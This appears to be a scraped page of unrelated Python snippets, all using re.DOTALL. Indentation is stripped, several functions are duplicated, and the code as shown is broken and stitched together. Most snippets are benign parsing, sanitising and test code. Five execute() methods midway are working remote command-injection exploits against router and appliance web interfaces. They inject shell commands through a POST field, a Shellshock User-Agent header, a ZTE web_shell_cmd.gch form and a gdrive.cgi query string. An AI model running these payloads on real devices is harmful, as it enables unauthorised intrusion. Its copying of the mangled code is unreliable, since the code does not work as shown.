def get_action(driver, keyword):
"""get action class corresponding to the keyword in the driver
"""
drvmod = 'ProductDrivers.' + driver
drvmodobj = importlib.import_module(drvmod)
drvfile_methods = inspect.getmembers(drvmodobj, inspect.isroutine)
main_method = [item[1] for item in drvfile_methods if item[0] == 'main'][0]
main_src = inspect.getsource(main_method)
pkglstmatch = re.search(r'package_list.*=.*\[(.*)\]', main_src, re.MULTILINE | re.DOTALL)
pkglst = pkglstmatch.group(1).split(',')
for pkg in pkglst:
pkgobj = importlib.import_module(pkg)
pkgdir = os.path.dirname(pkgobj.__file__)
action_modules = [pkg+'.'+name for _, name, _ in pkgutil.iter_modules([pkgdir])]
action_module_objs = [importlib.import_module(action_module) for action_module in action_modules]
for action_module_obj in action_module_objs:
for action_class in inspect.getmembers(action_module_obj, inspect.isclass):
for func_name in inspect.getmembers(action_class[1], inspect.isroutine):
if keyword == func_name[0]:
return action_class[1]
return None
python类DOTALL的实例源码
def safe_text_for_markdown(text):
"""Clean the text using bleach but keep certain Markdown sections.
Markdown code ie ` or ``` combos. For single `, do not allow line breaks between the tag.
Quotes ie '> ' which bleach would clean up.
"""
code_blocks, text = code_blocks_add_markers(text)
# Store quotes next
text = re.sub(r"(^> )", "%%safe_quote_in_start%%", text)
text = re.sub(r"(\n> )", "%%safe_quote_in_new_line%%", text, flags=re.DOTALL)
# Nuke all html, scripts, etc
text = bleach.clean(text or "")
# Return quotes
text = text.replace("%%safe_quote_in_start%%", "> ")
text = text.replace("%%safe_quote_in_new_line%%", "\n> ")
text = code_blocks_restore(code_blocks, text)
return text
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
result = client.request(url)
# cant user dom parser here because HTML is bugged div is not closed
result = re.findall ('<ul class="episodios">(.*?)</ul>', result, re.MULTILINE | re.DOTALL)
for item in result:
season_episodes = re.findall ('<li>(.*?)</li>', item, re.MULTILINE | re.DOTALL)
for row in season_episodes:
s = client.parseDOM(row, 'div', attrs={'class': 'numerando'})[0].split('x')
season_found = s[0].strip()
episode_found = s[1].strip()
if(season_found != season):
break
if episode_found == episode :
return client.parseDOM(row, 'a', ret='href')[0]
except:
return
def __search(self, titles, year):
try:
r = urllib.urlencode({'keyword': titles[0]})
r = client.request(urlparse.urljoin(self.base_link, self.search_link), XHR=True, post=r)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = json.loads(r)
r = [(i['link'], re.sub('<.+?>|</.+?>', '', i['title'])) for i in r if 'title' in i and 'link' in i]
r = [(i[0], i[1], re.findall('(.+?)\s*Movie \d+:.+?$', i[1], re.DOTALL)) for i in r]
r = [(i[0], i[2][0] if len(i[2]) > 0 else i[1]) for i in r]
r = [(i[0], i[1], re.findall('(.+?) \((\d{4})\)?', i[1])) for i in r]
r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
r = sorted(r, key=lambda i: int(i[2]), reverse=True) # with year > no year
r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y][0]
return source_utils.strip_domain(r)
except:
return
def remove_cpp_comment(code):
def blotOutNonNewlines(strIn): # Return a string containing only the newline chars contained in strIn
return "" + ("\n" * strIn.count('\n'))
def replacer(match):
s = match.group(0)
if s.startswith('/'): # Matched string is //...EOL or /*...*/ ==> Blot out all non-newline chars
return blotOutNonNewlines(s)
else: # Matched string is '...' or "..." ==> Keep unchanged
return s
pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE
)
return re.sub(pattern, replacer, code)
#remove non ASCII chars
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def _encode_regex(name, value, dummy0, dummy1):
"""Encode a python regex or bson.regex.Regex."""
flags = value.flags
# Python 2 common case
if flags == 0:
return b"\x0B" + name + _make_c_string_check(value.pattern) + b"\x00"
# Python 3 common case
elif flags == re.UNICODE:
return b"\x0B" + name + _make_c_string_check(value.pattern) + b"u\x00"
else:
sflags = b""
if flags & re.IGNORECASE:
sflags += b"i"
if flags & re.LOCALE:
sflags += b"l"
if flags & re.MULTILINE:
sflags += b"m"
if flags & re.DOTALL:
sflags += b"s"
if flags & re.UNICODE:
sflags += b"u"
if flags & re.VERBOSE:
sflags += b"x"
sflags += b"\x00"
return b"\x0B" + name + _make_c_string_check(value.pattern) + sflags
def run(cls):
"""Check variables."""
project = __import__(IMPORT, fromlist=[''])
for expected, var in [('@Robpol86', '__author__'), (LICENSE, '__license__'), (VERSION, '__version__')]:
if getattr(project, var) != expected:
raise SystemExit('Mismatch: {0}'.format(var))
# Check changelog.
if not re.compile(r'^%s - \d{4}-\d{2}-\d{2}[\r\n]' % VERSION, re.MULTILINE).search(readme()):
raise SystemExit('Version not found in readme/changelog file.')
# Check tox.
if INSTALL_REQUIRES:
contents = readme('tox.ini')
section = re.compile(r'[\r\n]+install_requires =[\r\n]+(.+?)[\r\n]+\w', re.DOTALL).findall(contents)
if not section:
raise SystemExit('Missing install_requires section in tox.ini.')
in_tox = re.findall(r' ([^=]+)==[\w\d.-]+', section[0])
if INSTALL_REQUIRES != in_tox:
raise SystemExit('Missing/unordered pinned dependencies in tox.ini.')
def strip_powershell_comments(data):
"""
Strip block comments, line comments and empty lines from a PowerShell source file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
# strip blank lines and lines starting with #
# noinspection PyPep8
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and
(not line.strip().startswith("#")))])
# TODO: strip comments at the end of lines
return strippedCode
def helper(self, term_instance):
"""
Called at the start of a WAV file capture. Calculates the length of the
file and modifies `self.re_capture` with laser precision.
"""
data = term_instance.capture
self.wav_header = struct.unpack(
'4si4s4sihhiihh4si', self.re_wav_header.match(data).group())
self.wav_length = self.wav_header[1] + 8
if not self.sent_message:
channels = "mono"
if self.wav_header[6] == 2:
channels = "stereo"
if self.wav_length != self.wav_header[12] + 44:
# Corrupt WAV file
message = _("WAV File is corrupted: Header data mismatch.")
term_instance.send_message(message)
term_instance.cancel_capture = True
message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels))
term_instance.send_message(message)
self.sent_message = True
# Update the capture regex with laser precision:
self.re_capture = re.compile(
b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL)
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def ParseWhois_INT(self):
int_contacts = (
{"page_field": "Registrant", "rec_field": "registrant"},
{"page_field": "Administrative Contact", "rec_field": "administrative"},
{"page_field": "Technical Contact", "rec_field": "technical"})
page = string.replace(self.page, "\r\n", "\n")
for contact in int_contacts:
page_field = contact['page_field']
s = "%s:(.*)\n\W" % page_field
m = re.search(s, page, re.DOTALL)
#if m: print m.group(1)
print "-------------------"
##
## ----------------------------------------------------------------------
##
##
## ----------------------------------------------------------------------
##
def __init__(self, pattern, markdown_instance=None):
"""
Create an instant of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*)$" % pattern,
re.DOTALL | re.UNICODE)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def chainReplace(toRegex, toValue, toArray):
# TODO clean up so that the input is headers+body and its called only once
# TODO support encoding, including URL encode
isBody = len(toArray)==1
if toRegex:
# BUG FIX: Geoff reported that if the regex ends at the newline on the last header,
# the regex fails. Hacky solution is to add an extra newlines before the regex search
# and remove it after.
to = "\r\n".join(toArray)+"\r\n\r\n"
match = re.search(toRegex, to, re.DOTALL)
if match and len(match.groups()):
ret = (to[0:match.start(1)]+toValue+to[match.end(1):])
if ret[-4:] == "\r\n\r\n":
ret = ret[:-4]
if isBody:
return [ret]
else:
return ret.split("\r\n")
return toArray
## Method to replace custom special types in messages
def test_image_required(self, capfd):
"""
When the main function is given no image argument, it should exit with
a return code of 2 and inform the user of the missing argument.
"""
with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
main(['--tag', 'abc'])
out, err = capfd.readouterr()
assert_that(out, Equals(''))
# More useful error message added to argparse in Python 3
if sys.version_info >= (3,):
# Use re.DOTALL so that '.*' also matches newlines
assert_that(err, MatchesRegex(
r'.*error: the following arguments are required: image$',
re.DOTALL
))
else:
assert_that(
err, MatchesRegex(r'.*error: too few arguments$', re.DOTALL))
def test_version_semver_requires_argument(self, capfd):
"""
When the main function is given the `--version-semver` option without
an argument, an error should be raised.
"""
with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
main([
'--version', '1.2.3',
'--version-semver',
'--semver-precision',
'--', 'test-image',
])
out, err = capfd.readouterr()
assert_that(out, Equals(''))
assert_that(err, MatchesRegex(
r'.*error: argument -P/--semver-precision: expected one argument$',
re.DOTALL
))
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
data = {'IF_ACTION': 'apply',
'IF_ERRORSTR': 'SUCC',
'IF_ERRORPARAM': 'SUCC',
'IF_ERRORTYPE': '-1',
'Cmd': cmd,
'CmdAck': ''}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def remove_stack_traces(out):
# this regexp taken from Python 2.5's doctest
traceback_re = re.compile(r"""
# Grab the traceback header. Different versions of Python have
# said different things on the first traceback line.
^(?P<hdr> Traceback\ \(
(?: most\ recent\ call\ last
| innermost\ last
) \) :
)
\s* $ # toss trailing whitespace on the header.
(?P<stack> .*?) # don't blink: absorb stuff until...
^(?=\w) # a line *starts* with alphanum.
.*?(?P<exception> \w+ ) # exception name
(?P<msg> [:\n] .*) # the rest
""", re.VERBOSE | re.MULTILINE | re.DOTALL)
blocks = []
for block in blankline_separated_blocks(out):
blocks.append(traceback_re.sub(r"\g<hdr>\n...\n\g<exception>\g<msg>", block))
return "".join(blocks)
def _parse_book_info(html):
"""???????????????????????
:param html(string): ?????????html
"""
end_flag = 'END_FLAG'
html = html.replace('<br>', end_flag)
html = html.replace('<br/>', end_flag)
doc = lxml.html.fromstring(html)
text = doc.text_content()
pattern = r'{}[:?](.*?){}'
result = dict()
for key, column in [
('author', '??'),
('press', '???'),
('publish_date', '???'),
('price', '??')]:
result[key] = re.search(pattern.format(column, end_flag),
text,
re.I | re.DOTALL).group(1).strip()
return result
def fprocess(infilep,outfilep):
"""
Scans an input file for LA equations between double square brackets,
e.g. [[ M3_mymatrix = M3_anothermatrix^-1 ]], and replaces the expression
with a comment containing the equation followed by nested function calls
that implement the equation as C code. A trailing semi-colon is appended.
The equation within [[ ]] should NOT end with a semicolon as that will raise
a ParseException. However, it is ok to have a semicolon after the right brackets.
Other text in the file is unaltered.
The arguments are file objects (NOT file names) opened for reading and
writing, respectively.
"""
pattern = r'\[\[\s*(.*?)\s*\]\]'
eqn = re.compile(pattern,re.DOTALL)
s = infilep.read()
def parser(mo):
ccode = parse(mo.group(1))
return "/* %s */\n%s;\nLAParserBufferReset();\n"%(mo.group(1),ccode)
content = eqn.sub(parser,s)
outfilep.write(content)
##-----------------------------------------------------------------------------------
def DownloadSetting(url):
list = []
try:
req = urllib2.Request(url)
req.add_header('User-Agent', 'VAS')
response = urllib2.urlopen(req)
link = response.read()
response.close()
xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link)
for link, name, date in xx:
print link, name, date
prelink = ''
if not link.startswith("http://"):
prelink = url.replace('asd.php','')
list.append((date, name, prelink + link))
except:
print"ERROR DownloadSetting %s" %(url)
return list
def suffix_map(par, job_suffix_dict, last_suffix_dict):
for key in last_suffix_dict.keys():
par = par.replace('{Suffix:' + key + '}', ' '.join(last_suffix_dict[key]))
suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)\\}", re.IGNORECASE | re.DOTALL)
for suf_item in re.findall(suffix_replacement_single, par):
job_step = int(suf_item[0])
if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys():
par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '}',
' '.join(job_suffix_dict[job_step][suf_item[1]]))
suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)-(\\d+)\\}", re.IGNORECASE | re.DOTALL)
for suf_item in re.findall(suffix_replacement_single, par):
job_step = int(suf_item[0])
file_order = int(suf_item[2]) - 1
if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys() \
and file_order < len(job_suffix_dict[job_step][suf_item[1]]):
par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '-' + suf_item[2] + '}',
job_suffix_dict[job_step][suf_item[1]][file_order])
return par
def checked_call(fn, ctx, *args):
res = fn(ctx, *args)
if not ctx.has_error:
return res
type_str = ffi.string(ctx.error_type).decode('utf8')
if ctx.error_display != ffi.NULL:
msg = ffi.string(ctx.error_display).decode('utf8').replace('\n', ' ')
else:
msg = None
err_type = EXCEPTION_MAP.get(type_str)
if err_type is FstError:
if ctx.error_description != ffi.NULL:
desc_str = ffi.string(ctx.error_description).decode('utf8')
else:
desc_str = None
enum_val = re.match(r'(\w+)\(.*?\)', desc_str, re.DOTALL).group(1)
err_type = EXCEPTION_MAP.get("{}::{}".format(type_str, enum_val))
if err_type is None:
msg = "{}: {}".format(enum_val, msg)
if err_type is None:
err_type = FstError
raise err_type(msg)